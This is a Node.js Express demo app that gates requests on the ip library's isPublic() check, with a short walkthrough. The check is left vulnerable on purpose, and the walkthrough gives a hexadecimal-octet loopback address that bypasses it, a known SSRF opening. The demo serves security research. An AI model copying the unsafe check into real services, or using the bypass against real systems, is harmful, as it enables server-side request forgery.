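const express = require('express');
const ip = require('ip');

const app = express();

// WARNING: This is a demonstration app for security research
// DO NOT use in production environments

/**
 * GET /check-endpoint?ip=<address>
 *
 * Allow/deny decision based solely on ip.isPublic().
 *
 * NOTE(review): ip.isPublic() accepts non-canonical textual forms of an
 * address (e.g. hexadecimal octets), so a loopback/private address can be
 * written in a form that the check classifies as public. A real service
 * must canonicalize the address and re-check the *resolved* address at
 * connect time instead of relying on this string check alone. The check
 * is intentionally left as-is here because it is what the demonstration
 * exercises.
 *
 * Responses:
 *   400 - `ip` is absent, empty, or not a single string (Express's query
 *         parser also accepts `ip[]=...` / `ip[k]=...`, which would
 *         otherwise reach ip.isPublic() unchecked)
 *   403 - address classified as private
 *   200 - address classified as public
 */
app.get('/check-endpoint', (req, res) => {
  const targetIp = req.query.ip;

  // Reject anything that is not one non-empty string before it reaches the
  // library; arrays/objects from the query parser are not addresses.
  if (typeof targetIp !== 'string' || targetIp.length === 0) {
    res.status(400).json({
      message: 'Missing or malformed ip parameter',
      isAllowed: false,
    });
    return;
  }

  // Vulnerable check that could be bypassed
  if (ip.isPublic(targetIp)) {
    // Simulate fetching data - in a real app this could lead to SSRF
    res.json({
      message: 'IP check passed',
      ip: targetIp,
      isAllowed: true,
    });
  } else {
    res.status(403).json({
      message: 'Access denied - private IP',
      ip: targetIp,
      isAllowed: false,
    });
  }
});

// Only run on localhost for testing
app.listen(3000, 'localhost', () => {
  console.log('Test environment running on http://localhost:3000');
});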
With this code, you can test the endpoint via two GET requests:
Valid request with a public IP:
http://localhost:3000/check-endpoint?ip=2.2.2.2
Invalid request with a private IP:
http://localhost:3000/check-endpoint?ip=127.0.0.1
Because the library's regex-based check is incomplete, it can be bypassed with an address written in hexadecimal octets:
0x0000007f.0x00000000.0x00000000.0x00000001
so if you send the request like:
http://localhost:3000/check-endpoint?ip=0x0000007f.0x00000000.0x00000000.0x00000001
You can see that the ip library treats this as a public IP, which can lead to SSRF.